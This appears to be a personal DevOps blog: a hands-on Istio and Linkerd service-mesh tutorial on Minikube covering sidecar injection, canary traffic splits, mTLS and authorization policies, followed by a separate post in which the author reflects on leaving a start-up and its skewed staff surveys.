mTLS (Mutual TLS)
- Enable cluster-wide:
kubectl apply -f istio-1.x.x/samples/security/strict-mtls.yaml
- Verify: istioctl x authz check <pod-name>
Authorization Policies
apiVersion: security.istio.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: allow-read
spec:
  action: ALLOW
  rules:
  - to:
    - operation:
        methods: ["GET"]
Exploring Istio's observability stack
Prometheus
- Access dashboard: istioctl dashboard prometheus
- Query metrics using PromQL
Grafana
- Access dashboard: istioctl dashboard grafana
- Explore pre-configured Istio dashboards
Kiali
- Access dashboard: istioctl dashboard kiali
- Visualize service mesh topology and health
Jaeger/Zipkin
- Access Jaeger UI: istioctl dashboard jaeger
- Analyze distributed traces
Day 4-5: Deploying a Sample Application with Istio
Objective
Deploy a simple web application with Istio sidecar injection and implement basic traffic routing.
Prerequisites
- Kubernetes cluster set up
- Istio installed with demo profile
- kubectl and istioctl configured
Enable Istio Sidecar Injection
First, let's enable Istio sidecar injection for the default namespace:
kubectl label namespace default istio-injection=enabled
(This can be verified with kubectl get namespace default --show-labels)
The command is used to enable automatic Istio sidecar injection for the default namespace in a Kubernetes cluster.
Key points about this command:
- Namespace-level control: By labeling a namespace, you're enabling Istio sidecar injection for all pods created in that namespace, unless overridden at the pod level.
- Automatic injection: When a namespace has this label, the Istio sidecar (Envoy proxy) will be automatically injected into all new pods deployed in that namespace.
- Existing workloads: This label only affects new pods. Existing workloads will need to be redeployed to get the sidecar injected.
- Override option: Even with this namespace-level setting, individual pods can opt out of injection using the sidecar.istio.io/inject: "false" annotation.
- Verification: After applying this label, you can verify it worked by deploying a new pod in the namespace and checking for the presence of the istio-proxy container.
- Reversibility: You can disable injection for the namespace by changing the label value to disabled or removing the label entirely.
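The verification step can be scripted. A hypothetical helper that inspects a pod manifest (e.g. the JSON from kubectl get pod <pod-name> -o json) for the istio-proxy container; has_sidecar is an illustrative name:

```python
def has_sidecar(pod):
    """Return True if the pod spec contains the istio-proxy sidecar."""
    names = [c["name"] for c in pod["spec"]["containers"]]
    return "istio-proxy" in names

# Minimal pod-spec fragments for demonstration
meshed = {"spec": {"containers": [{"name": "myapp"}, {"name": "istio-proxy"}]}}
plain = {"spec": {"containers": [{"name": "myapp"}]}}
print(has_sidecar(meshed), has_sidecar(plain))  # True False
```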
Deploy a Sample Application
Create a file named sample-app.yaml with the following content:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp
spec:
  replicas: 2
  selector:
    matchLabels:
      app: myapp
  template:
    metadata:
      labels:
        app: myapp
        version: v1
    spec:
      containers:
      - name: myapp
        image: nginx:1.14.2
        ports:
        - containerPort: 80
---
apiVersion: v1
kind: Service
metadata:
  name: myapp
spec:
  selector:
    app: myapp
  ports:
  - port: 80
    targetPort: 80
Or apply it in one step by piping a heredoc to kubectl:
cat <<EOF | kubectl apply -f -
<the YAML above>
EOF
Deploy the application:
kubectl apply -f sample-app.yaml
Verify the deployment:
kubectl get pods
You should see two containers per pod (app + istio-proxy), indicating successful sidecar injection.
e.g. kubectl describe pod/<pod-name>
You will see something like
Events:
  Type    Reason     Age    From               Message
  ----    ------     ----   ----               -------
  Normal  Scheduled  5m     default-scheduler  Successfully assigned default/myapp-7d4cbc4c78-mhdmd to minikube
  Normal  Pulled     5m     kubelet            Container image "docker.io/istio/proxyv2:1.23.2" already present on machine
  Normal  Created    5m     kubelet            Created container istio-init
  Normal  Started    5m     kubelet            Started container istio-init
  Normal  Pulling    5m     kubelet            Pulling image "nginx:1.14.2"
  Normal  Pulled     4m54s  kubelet            Successfully pulled image "nginx:1.14.2" in 885ms (5.074s including waiting). Image size: 102757429 bytes.
  Normal  Created    4m54s  kubelet            Created container myapp
  Normal  Started    4m54s  kubelet            Started container myapp
  Normal  Pulled     4m54s  kubelet            Container image "docker.io/istio/proxyv2:1.23.2" already present on machine
  Normal  Created    4m54s  kubelet            Created container istio-proxy
  Normal  Started    4m54s  kubelet            Started container istio-proxy
Create a Virtual Service
Create a file named virtual-service.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: myapp-route
spec:
  hosts:
  - myapp
  http:
  - route:
    - destination:
        host: myapp
        subset: v1
Apply the Virtual Service:
kubectl apply -f virtual-service.yaml
View it with:
kubectl get virtualservices
A VirtualService in Istio is a custom resource definition (CRD) that allows you to configure how requests are routed to services within the Istio service mesh. It acts as a flexible and powerful tool for traffic management, enabling you to define routing rules that dictate how traffic should be directed to different service versions or destinations based on specified criteria.
Key Features of VirtualService
- Traffic Routing.
- Decoupling Requests and Destinations.
- Advanced Traffic Management.
- Integration with Other Istio Resources.
- Internal and External Traffic Control.
Create a Destination Rule
Create a file named destination-rule.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: myapp-destination
spec:
  host: myapp
  subsets:
  - name: v1
    labels:
      version: v1
Apply the Destination Rule:
kubectl apply -f destination-rule.yaml
Verify with:
kubectl get destinationrules
Test the Routing
To test the routing, we'll need to access the application. For simplicity, let's use port-forwarding:
kubectl port-forward service/myapp 8080:80
Now, in another terminal, you can access the application:
curl http://localhost:8080
You should see the nginx welcome page.
Implement Canary Deployment
Let's update our application to version 2. Create a file named sample-app-v2.yaml:
apiVersion: apps/v1
kind: Deployment
metadata:
  name: myapp-v2
spec:
  replicas: 1
  selector:
    matchLabels:
      app: myapp
      version: v2
  template:
    metadata:
      labels:
        app: myapp
        version: v2
    spec:
      containers:
      - name: myapp
        image: nginx:1.16.0
        ports:
        - containerPort: 80
Deploy version 2:
kubectl apply -f sample-app-v2.yaml
Update the virtual-service.yaml to split traffic:
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: myapp-route
spec:
  hosts:
  - myapp
  http:
  - route:
    - destination:
        host: myapp
        subset: v1
      weight: 75
    - destination:
        host: myapp
        subset: v2
      weight: 25
Update the destination-rule.yaml:
apiVersion: networking.istio.io/v1alpha3
kind: DestinationRule
metadata:
  name: myapp-destination
spec:
  host: myapp
  subsets:
  - name: v1
    labels:
      version: v1
  - name: v2
    labels:
      version: v2
Apply the updated configurations:
kubectl apply -f virtual-service.yaml
kubectl apply -f destination-rule.yaml
Now, when you access the application, 75% of the traffic will go to v1 and 25% to v2.
Test the split by sampling the Server response header, which carries the nginx version:
for i in {1..200}; do curl -sI http://localhost:8080 | grep -i '^server'; sleep .5; done
Observability
Apply Prometheus:
kubectl apply -f https://raw.githubusercontent.com/istio/istio/release-1.23/samples/addons/prometheus.yaml
Apply Kiali:
kubectl apply -f https://raw.githubusercontent.com/istio/istio/release-1.23/samples/addons/kiali.yaml
Access the dashboard:
istioctl dashboard kiali
Conclusion
In this lesson, we've deployed a sample application with Istio, implemented basic traffic routing, and set up a canary deployment. This demonstrates some of Istio's core traffic management capabilities. In a real-world scenario, you would monitor the performance of both versions and gradually adjust the traffic split until you're confident in the new version's performance.
Remember to clean up your resources after the lesson:
kubectl delete -f sample-app.yaml
kubectl delete -f sample-app-v2.yaml
kubectl delete -f virtual-service.yaml
kubectl delete -f destination-rule.yaml
This lesson provides a practical introduction to Istio's traffic management features. For more advanced scenarios, you could explore features like fault injection, circuit breaking, and more complex routing rules.
If you're using Minikube, a simple minikube delete will remove every trace of the cluster.
Week 4: Linkerd and Practical Applications
Day 1: Linkerd Basics
Installing Linkerd on your Kubernetes cluster
Install CLI
https://linkerd.io/2.16/tasks/install/
Again, macOS users can use Homebrew (brew install linkerd); otherwise:
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh
export PATH=$PATH:$HOME/.linkerd2/bin
linkerd version
Alternatively, you can download the binary directly from the Linkerd releases page.
Install Linkerd on Your Minikube Cluster
linkerd install --crds | kubectl apply -f -
linkerd install --set proxyInit.runAsRoot=true | kubectl apply -f -
Validate cluster
linkerd check --pre
Install Linkerd
linkerd install | kubectl apply -f -
Install viz
linkerd viz install | kubectl apply -f -
linkerd viz check
linkerd viz dashboard
Linkerd's architecture and core components
Control Plane
- controller: Manages and configures proxy instances
- destination: Service discovery and load balancing
- identity: Certificate management for mTLS
Data Plane
linkerd-proxy: Ultra-lightweight proxy (written in Rust)
Add-ons
- Grafana: Metrics visualization
- Prometheus: Metrics collection
Linkerd Features
Traffic management capabilities
Traffic Split:
apiVersion: split.smi-spec.io/v1alpha1
kind: TrafficSplit
metadata:
  name: web-split
spec:
  service: web-svc
  backends:
  - service: web-v1
    weight: 500m
  - service: web-v2
    weight: 500m
Retries and Timeouts: Configured via annotations
Linkerd's observability and security features
- Automatic mTLS: enabled by default for all meshed services
- Metrics: access via CLI or Grafana dashboards
linkerd viz stat deployment
- Live Traffic View:
linkerd viz top
- Traffic Inspection:
linkerd tap deployment/your-deployment
Day 2-4: Hands-on Exercise
Deploying and Managing emojivoto with Linkerd
Sheet here Linkerd in a Minikube Env
Deploy the emojivoto sample application
curl -sL https://run.linkerd.io/emojivoto.yml | kubectl apply -f -
This command downloads the emojivoto application manifest and applies it to your Kubernetes cluster. Verify the deployment:
kubectl get pods -n emojivoto
Inject Linkerd into the application
kubectl get -n emojivoto deploy -o yaml | linkerd inject - | kubectl apply -f -
This command retrieves all deployments in the emojivoto namespace, injects the Linkerd sidecar, and reapplies the configuration. Verify the injection:
kubectl get pods -n emojivoto
You should now see two containers per pod (the application container and the Linkerd proxy).
Observe traffic
Install smi
helm repo add linkerd-smi https://linkerd.github.io/linkerd-smi
helm install smi linkerd-smi/linkerd-smi
The Service Mesh Interface (SMI) is a standard specification for service meshes on Kubernetes, providing a set of common APIs to enable interoperability between different service mesh implementations, allowing users to manage microservices communication without being tied to a specific provider.
linkerd viz stat -n emojivoto deploy
This command shows real-time metrics for your deployments, including success rate, requests per second, and latency.
Visualize the service mesh
linkerd viz dashboard
This opens the Linkerd dashboard in your default browser. Explore the various sections to see detailed metrics, topology, and live calls.
In a separate terminal, create a port forward: kubectl -n emojivoto port-forward svc/web-svc 8080:80
Then generate traffic: for i in {1..20000}; do curl -s http://localhost:8080; done
Implement a traffic split for canary deployment
First, let's create a new version of the voting service:
cat <<EOF | kubectl apply -f -
apiVersion: apps/v1
kind: Deployment
metadata:
  name: voting-v2
  namespace: emojivoto
spec:
  replicas: 1
  selector:
    matchLabels:
      app: voting-svc
      version: v2
  template:
    metadata:
      labels:
        app: voting-svc
        version: v2
    spec:
      containers:
      - name: voting-svc
        image: buoyantio/emojivoto-voting-svc:v11
        env:
        - name: GRPC_PORT
          value: "8080"
        ports:
        - containerPort: 8080
EOF
Or script it from an existing deployment (this variant copies the web deployment to a web-v2):
(kubectl get deployments web -n emojivoto -o yaml > web-deployment.yaml; \
 sed -i 's/name: web/name: web-v2/' web-deployment.yaml; \
 sed -i 's/image: emojivoto-web:v1/image: emojivoto-web:v2/' web-deployment.yaml; \
 kubectl apply -f web-deployment.yaml; \
 rm web-deployment.yaml)
Now, create a TrafficSplit to gradually shift traffic:
cat <<EOF | kubectl apply -f -
apiVersion: split.smi-spec.io/v1alpha2
kind: TrafficSplit
metadata:
  name: voting-split
  namespace: emojivoto
spec:
  service: voting-svc
  backends:
  - service: voting
    weight: 900
  - service: voting-v2
    weight: 100
EOF
This configuration sends 90% of traffic to the original version and 10% to the new version.
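SMI weights are Kubernetes-style quantities, and only their ratio matters: 900/100 behaves the same as 90/10, and "500m" means 0.5. A small sketch of how the weights normalise into traffic fractions (parse_weight and traffic_fractions are illustrative names, not an SMI API):

```python
def parse_weight(w):
    """Parse a Kubernetes quantity: '900' -> 900.0, '500m' -> 0.5."""
    w = str(w)
    return float(w[:-1]) / 1000 if w.endswith("m") else float(w)

def traffic_fractions(backends):
    """Normalise backend weights into fractions that sum to 1."""
    weights = {name: parse_weight(w) for name, w in backends.items()}
    total = sum(weights.values())
    return {name: w / total for name, w in weights.items()}

print(traffic_fractions({"voting": "900", "voting-v2": "100"}))
# {'voting': 0.9, 'voting-v2': 0.1}
print(traffic_fractions({"voting": "500m", "voting-v2": "500m"}))
# {'voting': 0.5, 'voting-v2': 0.5}
```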
Re-run the injection so the new voting-v2 deployment joins the mesh: kubectl get -n emojivoto deploy -o yaml | linkerd inject - | kubectl apply -f -
Observe the traffic split
linkerd viz stat -n emojivoto deploy voting voting-v2
You should see traffic being split between the two versions according to the weights specified in the TrafficSplit resource.
Gradually increase traffic to the new version
As you gain confidence in the new version, you can update the TrafficSplit to increase traffic to v2:
cat <<EOF | kubectl apply -f -
apiVersion: split.smi-spec.io/v1alpha2
kind: TrafficSplit
metadata:
  name: voting-split
  namespace: emojivoto
spec:
  service: voting-svc
  backends:
  - service: voting
    weight: 500m
  - service: voting-v2
    weight: 500m
EOF
This updates the split to 50/50 between the two versions.
Monitor the canary deployment
Use the Linkerd dashboard or CLI to monitor the performance of both versions:
linkerd viz stat -n emojivoto deploy voting voting-v2
Keep an eye on success rates, latency, and request volumes to ensure the new version is performing as expected.
(In dashboard services → voting-svc will show the split and successes)
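The judgement you'd otherwise make by eye can be expressed as a simple rule: keep promoting while the canary's success rate stays within a tolerance of the stable version's; otherwise roll back. A sketch with illustrative thresholds (in practice you'd feed it from linkerd viz stat output or the Prometheus metrics behind it):

```python
def canary_verdict(stable_sr, canary_sr, tolerance=0.02):
    """Compare success rates (0.0-1.0) and decide the next step."""
    if canary_sr >= stable_sr - tolerance:
        return "promote"   # canary healthy: shift more weight to it
    return "rollback"      # canary degraded: send traffic back to stable

print(canary_verdict(stable_sr=0.99, canary_sr=0.985))  # promote
print(canary_verdict(stable_sr=0.99, canary_sr=0.90))   # rollback
```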
Conclusion
In this hands-on exercise, you've:
- Deployed the emojivoto sample application
- Injected Linkerd into the application
- Observed traffic using Linkerd's CLI and dashboard
- Implemented a canary deployment using TrafficSplit
- Monitored the performance of both versions during the canary rollout
This exercise demonstrates Linkerd's key features for traffic management and observability, providing a practical introduction to service mesh concepts and canary deployments.
Day 5: Service Mesh Comparison
Comparing Istio, Linkerd, and other service mesh solutions
Istio
- Pros: Feature-rich, powerful traffic management
- Cons: Complex, resource-intensive
Linkerd
- Pros: Lightweight, simple, fast
- Cons: Fewer advanced features
Consul Connect
- Pros: Integrates well with HashiCorp ecosystem
- Cons: Less mature as a full service mesh
NGINX Service Mesh
- Pros: Builds on familiar NGINX technology
- Cons: Relatively new, smaller community
When to choose one service mesh over another
- Choose Istio for complex, feature-rich requirements
- Choose Linkerd for simplicity and performance
- Consider Consul Connect if already using HashiCorp tools
- NGINX Service Mesh if familiar with NGINX and need basic mesh features
Week 5: Practical Project
Designing and implementing a microservices application
- Create 3-4 simple microservices (e.g., frontend, backend, database)
- Containerize each service with Docker
- Create Kubernetes manifests for each service
Deploying the application using Helm
- Create a Helm chart for the entire application
- Use subchart for each microservice
- Define configurable values in values.yaml
Implementing service mesh features
- Choose either Istio or Linkerd based on your preference
- Implement traffic routing between service versions
- Set up mTLS between services
- Configure observability (metrics, tracing)
Creating Python scripts for automation
- Script to deploy/update the Helm release
- Script to check service health and metrics
- Script to perform canary deployments
This comprehensive deep dive covers the entire 4-week training plan, providing a solid foundation in Kubernetes, service mesh technologies, and related tools. Remember to practice hands-on with each concept and refer to official documentation for the most up-to-date information.
Additional Resources and Best Practices
- Throughout the training, refer to official documentation for each technology
- Join community forums or discussion groups for each technology
- Consider working on a personal project that incorporates all these technologies
- Explore real-world use cases and examples
- Practice hands-on exercises daily
Tips for Successful Service Mesh Adoption
- Start your service mesh journey early to allow your knowledge to grow organically as your microservices landscape evolves.
- Avoid common design and implementation pitfalls by thoroughly understanding each technology.
- Leverage your service mesh as the mission control of your multi-cloud microservices landscape.
- Consider starting with a sample project to evaluate which service mesh solution you prefer before standardizing across all services.
- Use service mesh as a ‘bridge’ while decomposing monolithic applications into microservices.
- Implement service mesh incrementally, starting with the components you need most.
By following this training plan, you'll gain a solid foundation in service mesh concepts, Kubernetes, Helm, and Python, with practical experience in both Istio and Linkerd. Remember to adapt the pace and depth of each topic based on your prior knowledge and learning speed.
Tools
k9s : https://enix.io/en/blog/k9s/
jq : https://jqlang.github.io/jq/
kubectl : https://kubernetes.io/docs/tasks/tools/
docker: https://docs.docker.com/engine/install/
Minikube Linkerd
A working service-mesh tutorial — install, observe, secure, route
This is the worked tutorial I wish I’d had when I first stood up a service mesh on a laptop — install Linkerd into Minikube, deploy a sample app, see the mesh in action (mTLS, observability, traffic split, authorization), then tear it down. Pairs with my 5-Week DevOps Training Plan; also useful prep for Helm, Docker, and Kubernetes: A Tiny Training App to Break (and Fix).
Contents
- Prerequisites
- Set up Minikube
- Deploy a sample app
- Install Linkerd
- Inject the proxies
- Explore the mesh
- Dashboard and observability
- mTLS verification
- Traffic management with HTTPRoute
- Authorization policies (mTLS-enforced access)
- Tap and Top
- Cleaning up
- Troubleshooting
- Where to go next
Prerequisites
- Minikube. Install. 4 GB RAM allocated to the VM is comfortable; 2 GB will work but be sluggish.
- kubectl. Configured to talk to your Minikube cluster.
- Linkerd CLI. We’ll install this in a moment.
- A few minutes of patience. Container pulls take longer than the docs imply.
You don’t need to know Linkerd’s internals to follow this — the proxy is a sidecar that intercepts traffic for each pod, and the control plane manages identity, configuration, and metrics. That’s the mental model.
Set up Minikube
Start the cluster with enough resources to be useful:
minikube start --cpus=4 --memory=4096 --kubernetes-version=v1.30.0
minikube status
kubectl get nodes
Confirm kubectl get nodes shows a Ready node before moving on.
Deploy a Sample Application: emojivoto
Linkerd ships a small demo app called emojivoto — a couple of Go services with a Vue frontend, deliberately a bit broken (the doughnut vote always fails, on purpose, so you can see the mesh catch errors).
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/emojivoto.yml | \
kubectl apply -f -
kubectl get pods -n emojivoto
Wait until all pods are Running. Then port-forward the web service so you can hit it from a browser:
kubectl -n emojivoto port-forward svc/web-svc 8080:80
Open http://localhost:8080. You should see the emoji voting page. Click an emoji or two — you’re now generating traffic that the mesh will see once we install it.
Leave the port-forward running in another terminal.
Install Linkerd
Install the CLI
Pin a version. Linkerd’s stable channel as of writing is 2.16+; check linkerd.io/2/install for current.
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/install | sh
export PATH=$PATH:$HOME/.linkerd2/bin
# stash this in your shell rc so it survives a new shell
echo 'export PATH=$PATH:$HOME/.linkerd2/bin' >> ~/.zshrc
linkerd version
Pre-flight Check
Linkerd is paranoid about installing into a cluster it doesn’t trust. Run the pre-flight before you commit:
linkerd check --pre
Every check should be green. If anything’s red, fix it before continuing — installing on top of a half-working cluster is a recipe for confusing failures later.
Install the Control Plane
Two-step install — CRDs first, then the control plane:
linkerd install --crds | kubectl apply -f -
linkerd install | kubectl apply -f -
# verify
linkerd check
The full check is the moment of truth — every section green means the mesh is ready.
Inject the Proxies
Linkerd doesn’t apply itself automatically; you tell it which workloads should be meshed. The simplest way is to grab the existing deployments, pipe them through linkerd inject, and re-apply:
kubectl get -n emojivoto deploy -o yaml | \
linkerd inject - | \
kubectl apply -f -
# pods will roll over with sidecars attached
kubectl get pods -n emojivoto
Each pod should now show 2/2 containers running (your app + the linkerd-proxy sidecar). That 2/2 is the visual confirmation the mesh is on.
For production, you’d typically annotate the namespace so any deployment in it gets injected automatically:
kubectl annotate namespace emojivoto linkerd.io/inject=enabled
Explore the Mesh
Dashboard and Observability
Linkerd Viz is a separate extension for the dashboard, Prometheus, Grafana, and Jaeger.
linkerd viz install | kubectl apply -f -
linkerd viz check
linkerd viz dashboard &
The dashboard opens in your browser. Click into the emojivoto namespace and you’ll see live metrics — request rate, success rate, p50/p95/p99 latency, retries, and TCP-level stats — for every service. The vote-doughnut endpoint is going to look red because that’s the deliberately-broken bit.
Linkerd’s metrics live in Prometheus and are available via linkerd viz:
# RPS by service
linkerd viz stat deploy -n emojivoto
# detailed view of one service
linkerd viz stat deploy/web -n emojivoto --window 1m
A useful pattern: get raw Prometheus metrics out of the viz extension and write your own queries / dashboards in your own Grafana:
kubectl port-forward -n linkerd-viz svc/prometheus 9090:9090
# Then in your browser at http://localhost:9090:
# rate(request_total{namespace="emojivoto"}[1m])
# histogram_quantile(0.99, rate(response_latency_ms_bucket{namespace="emojivoto"}[1m]))
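histogram_quantile works by finding the cumulative bucket that contains the target rank and interpolating linearly within it. A minimal Python re-implementation, just to build intuition for the PromQL above (the bucket data is made up, not real mesh metrics):

```python
def histogram_quantile(q, buckets):
    """buckets: list of (upper_bound, cumulative_count), sorted by bound,
    mirroring Prometheus's cumulative 'le' buckets."""
    total = buckets[-1][1]
    rank = q * total
    prev_bound, prev_count = 0.0, 0
    for bound, count in buckets:
        if count >= rank:
            # linear interpolation within the bucket holding the rank
            return prev_bound + (bound - prev_bound) * (rank - prev_count) / (count - prev_count)
        prev_bound, prev_count = bound, count
    return buckets[-1][0]

# cumulative: 60% of requests under 10ms, 90% under 50ms, all under 100ms
buckets = [(10, 600), (50, 900), (100, 1000)]
print(histogram_quantile(0.5, buckets))   # ~8.33 ms
print(histogram_quantile(0.99, buckets))  # 95.0 ms
```

This is also why bucket boundaries matter: the quantile is only ever as precise as the bucket it lands in.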
mTLS Verification
The killer feature: every meshed pod gets a workload identity, certificates issued and rotated automatically, and traffic between meshed pods is mTLS-encrypted with no app changes. Verify it:
linkerd viz tap deploy/web -n emojivoto
Hit the website, vote a few emojis. The tap output will scroll past, with lines like:
req id=12:0 proxy=in src=10.244.0.60:59620 dst=10.244.0.58:8080 tls=true
rsp id=12:0 proxy=in src=10.244.0.60:59620 dst=10.244.0.58:8080 tls=true :status=200 latency=959µs
tls=true is what you’re looking for. That’s mutual TLS between the source and destination pods — no per-app TLS engineering, no certificate juggling, no surprises.
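If you'd rather script the check than eyeball the stream, tap's key=value fields are easy to parse. A small sketch (parse_tap_line is an illustrative helper, matched against the sample line above):

```python
import re

TAP_FIELD = re.compile(r"(\w+)=(\S+)")

def parse_tap_line(line):
    """Extract key=value pairs from a linkerd viz tap output line."""
    return dict(TAP_FIELD.findall(line))

line = "req id=12:0 proxy=in src=10.244.0.60:59620 dst=10.244.0.58:8080 tls=true"
fields = parse_tap_line(line)
print(fields["tls"])  # true
```

From there it's one list comprehension to flag any un-meshed traffic (lines where tls is not "true").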
Traffic Management with HTTPRoute
Linkerd 2.14+ uses the Gateway API (HTTPRoute) for traffic splitting; the older TrafficSplit resource is deprecated.
Imagine you’ve built web-v2 with new colours and want 50% of traffic to hit it. (We won’t actually deploy a v2 here — assume it exists for the demo.)
kubectl apply -f - <<'EOF'
apiVersion: gateway.networking.k8s.io/v1beta1
kind: HTTPRoute
metadata:
  name: web-split
  namespace: emojivoto
spec:
  parentRefs:
  - name: web-svc
    kind: Service
    group: ""
    port: 80
  rules:
  - backendRefs:
    - name: web-svc
      port: 80
      weight: 50
    - name: web-v2-svc
      port: 80
      weight: 50
EOF
You can change the weights any time and the mesh will rebalance traffic without restarting anything. Canaries, blue/green, and progressive delivery patterns build on top of this primitive.
Authorization Policies (mTLS-Enforced Access)
Past 2.12, Linkerd has first-class authorization policies. Combine Server (which port on which workload accepts traffic) with AuthorizationPolicy (who can reach it) to enforce identity-based access between meshed workloads.
Lock down the voting-svc so only the web service can call it:
kubectl apply -f - <<'EOF'
apiVersion: policy.linkerd.io/v1beta1
kind: Server
metadata:
  name: voting-grpc
  namespace: emojivoto
spec:
  podSelector:
    matchLabels: { app: voting-svc }
  port: 8080
  proxyProtocol: gRPC
---
apiVersion: policy.linkerd.io/v1beta1
kind: AuthorizationPolicy
metadata:
  name: voting-allow-web
  namespace: emojivoto
spec:
  targetRef:
    group: policy.linkerd.io
    kind: Server
    name: voting-grpc
  requiredAuthenticationRefs:
  - kind: ServiceAccount
    name: web
    namespace: emojivoto
EOF
Any other meshed pod trying to call voting-svc:8080 now gets denied at the proxy. This is real, identity-based service-to-service authorisation — no IP allowlists, no shared secrets. For the broader picture this fits into, see Zero Trust Architecture: A Deep Practical Walkthrough.
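At its core, the decision the proxy now makes is an allow-list over workload identities derived from the client's mTLS certificate. A toy model of that logic (illustrative only; the identity strings here assume Linkerd's serviceaccount-based identity naming, and the real evaluation happens in the proxy, not in Python):

```python
def authorize(client_identity, allowed_identities):
    """Toy policy check: allow only identities named by the policy."""
    return "ALLOW" if client_identity in allowed_identities else "DENY"

# Only the web service account may call voting-svc:8080
allowed = {"web.emojivoto.serviceaccount.identity.linkerd.cluster.local"}

print(authorize("web.emojivoto.serviceaccount.identity.linkerd.cluster.local", allowed))       # ALLOW
print(authorize("vote-bot.emojivoto.serviceaccount.identity.linkerd.cluster.local", allowed))  # DENY
```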
Tap and Top
Two CLI tools that pay off when something’s broken at 11pm:
# live request stream — tcpdump for HTTP
linkerd viz tap deploy/web -n emojivoto
# top-N requests by route, like top(1) but for service traffic
linkerd viz top deploy/web -n emojivoto
top is the one I reach for first when something’s slow — it shows the path that’s hot and lets you drill in. Pair with the dashboard for the visual view.
Cleaning Up
Tear it all down in reverse order:
# remove the demo app
curl --proto '=https' --tlsv1.2 -sSfL https://run.linkerd.io/emojivoto.yml | \
kubectl delete -f -
# remove Linkerd Viz
linkerd viz uninstall | kubectl delete -f -
# remove the Linkerd control plane
linkerd uninstall | kubectl delete -f -
# stop Minikube if you're done
minikube stop
# nuke it entirely if you want a clean slate
minikube delete
Troubleshooting
The errors I’ve actually hit during fresh installs:
“No objects passed to apply” during linkerd install — you forgot the CRDs step. Run:
linkerd install --crds | kubectl apply -f -
then re-run the control-plane install.
Pods stuck Init:Error after injection — usually proxyInit running into kernel-permission issues on local clusters. The default is fine on most Minikube setups; if it isn’t, you’ll want to investigate the init container logs:
kubectl logs -n emojivoto <pod> -c linkerd-init
If you see iptables errors, the older workaround was --set proxyInit.runAsRoot=true on install. Modern Linkerd handles this without the flag on most setups.
linkerd check red on identity — usually clock skew between Minikube and your host. Compare date -u on the host with minikube ssh -- date -u; if they disagree, restart Minikube and the host's time sync, then run linkerd check again.
tls=false in linkerd viz tap — the source pod isn’t meshed, or the destination isn’t. Check both have 2/2 containers running.
Where to Go Next
Real things to try once you’re comfortable:
- Multicluster. Linkerd’s multicluster extension lets meshes span clusters with mTLS-everywhere over the public internet — useful for HA across regions, gradual cluster migration, or tying staging to a separate cluster.
- Service Profiles and retry budgets. Define per-route retry policies and timeouts in YAML; let the mesh handle transient failures without app code knowing.
- Replace Viz Prometheus with your own. The bundled Prometheus is fine for play; in prod, point Linkerd’s metrics at your existing Prometheus or Mimir.
- Argo Rollouts + Linkerd. Progressive delivery using HTTPRoute weights, automated based on success-rate metrics from the mesh.
- Run Buoyant Cloud or self-hosted Buoyant Enterprise for Linkerd if you want a managed control plane — same OSS Linkerd underneath, with extras for compliance and FIPS.
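To make the Service Profiles bullet concrete, here is roughly what a per-route retry policy for emojivoto's voting service looks like. This is a sketch of the linkerd.io/v1alpha2 ServiceProfile API from memory; the route name and path regex are illustrative, and linkerd profile can generate a skeleton for you, so prefer that and the docs over my field names:

```yaml
apiVersion: linkerd.io/v1alpha2
kind: ServiceProfile
metadata:
  # ServiceProfiles are named after the service's in-cluster FQDN
  name: voting-svc.emojivoto.svc.cluster.local
  namespace: emojivoto
spec:
  routes:
    - name: VoteDoughnut
      condition:
        method: POST
        pathRegex: /emojivoto\.v1\.VotingService/VoteDoughnut
      isRetryable: true        # the proxy may retry this route on failure
  retryBudget:
    retryRatio: 0.2            # at most 20% extra load from retries
    minRetriesPerSecond: 10
    ttl: 10s
```

Apply it in the same namespace as the service and the proxies pick it up automatically; linkerd viz routes then starts reporting per-route stats.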
Additional Resources
- Linkerd Documentation — official, current, comprehensive.
- Linkerd Slack — surprisingly responsive for an OSS project.
- Minikube Documentation — for managing your local cluster.
- 5-Week DevOps Training Plan — service mesh, K8s, and the rest of the curriculum this fits into.
All Change!
I've changed direction, kinda
Well it's been a while.
Things have changed, and I hope for the better. I've taken a step in a different direction. Don't get me wrong, I still wish to pursue a career in security, but I had to accept that the offers were not going to just come to me without experience or another avenue.
For background, I have worked in a number of start‑ups, and they are a different environment to work in. They are fickle, risky, challenging, but offer close‑knit teams and a sense of adventure you don't get elsewhere.
Joining early will give an opportunity to grow, but you have to be comfortable with change. You need to be happy to fill any space that is required. If you are a dev and that is all you do, then a start‑up may not be the place for you. When the server breaks, if you aren't prepared to roll up your sleeves and get your hands dirty, you're not right for it. This can be the attractiveness of a start‑up: not being a one‑trick pony.
Well, I was in a start‑up, but it had grown and was no longer a real start‑up. I won't go deeply into it, but it had lost its way in many places. Successful? Yeah. It was almost making money and was on the path to greatness, but this was at the expense of the people. It may catch this and try to turn it around, but it had made many of the mistakes start‑ups make: way too top‑heavy, no longer nimble, a push‑down mentality. There was a lot of unhappiness and anger, and after threats of leaving, union action and lots of letters, emails, meetings and surveys (oh, the constant surveys, so skewed to get the answers they want, or stats skewed the same way), they were trying to change, but in completely the wrong way.
Just to cover the type of skew they used in an update:
- Latest: “We have a happiness rating of 45%” – that is as good as the rest of the industry and so we are happy.
- 1 year earlier: “We have a happiness rating of 85%” – we are very proud of this and lead the industry.
A trick employed (an old one) is to have Q1, just before this, be:
- Highlight a recent moment that has made you happy at work
then:
- Q2: On a scale of 1 to 4, how would you describe your overall sense of happiness?
- 1: Unhappy – I never experience joy and satisfaction in my daily life.
- 2: Happy – I generally feel positive and appreciate the good moments, even when faced with challenges.
- 3: Slightly Happy – I often find reasons to smile and enjoy life's little pleasures, contributing to my overall well‑being.
- 4: Very Happy – I experience a deep sense of joy and fulfilment, embracing each day with enthusiasm and positivity.
Appraisal: you are scored out of 4:
- 1 = Below expectation
- 2 = Meeting or exceeding expectation
- 3 = Working well beyond expectation
- 4 = You lead the way
This was so skewed that only those with a 4 were considered for pay rises or promotion, plus there was a cap on how many 4s, promotions and raises could be given.
Everything became about being as good as others in the industry. There used to be a desire to be the best, to lead the way and to exceed. To many, settling for “as good as the industry” after so long leading it was failure, a degrading of the values and the drive.
